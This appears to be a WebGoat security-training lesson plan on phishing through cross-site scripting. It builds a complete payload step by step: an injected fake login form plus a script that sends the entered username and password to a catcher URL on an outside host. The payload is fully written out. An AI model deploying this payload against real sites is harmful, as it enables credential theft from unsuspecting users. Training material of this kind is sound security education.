Lesson Plan Title: Phishing with XSS
Concept / Topic To Teach:
It is always a good practice to validate all input on the
server side. XSS can occur when unvalidated user input is used
in an HTTP response. With the help of XSS you can do a Phishing
Attack and add content to a page which looks official. It is very
hard for a victim to determinate that the content is malicious.
General Goal(s):
The user should be able to add a form asking for username
and password. On submit the input should be sent to
http://efeso4.mat.unical.it/WebGoat/catcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName
</form><form name="phish"><br><br><HR><H3>This feature requires account login:</H3
><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password"
name = "pass"><br></form><br><br><HR>
Search for this term and you will see that a form is added to the page since the search field accepts HTML.
The initial </form> tag is to terminate the original search form.
<script>function hack(){ XSSImage=new Image; XSSImage.src="http://efeso4.mat.unical.it/WebGoat/catcher?PROPERTY=yes&user="+ document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);} </script>
This script will read the input from the form and send it to the catcher of WebGoat.
The text in blue should match what is in your address bar. If you are using ports and/or webscarab, it may be different.
The last step is to put things together. Add a Button to the form which
calls the script. You can reach this with the onclick="myFunction()" handler:
<input type="submit" name="login" value="login" onclick="hack()">
The final String looks like this:
</form><script>function hack(){ XSSImage=new Image; XSSImage.src="http://efeso4.mat.unical.it/WebGoat/catcher?PROPERTY=yes&user="+
document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen.
User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);}
</script><form name="phish"><br><br><HR><H3>This feature requires account login:</H3
><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password"
name = "pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>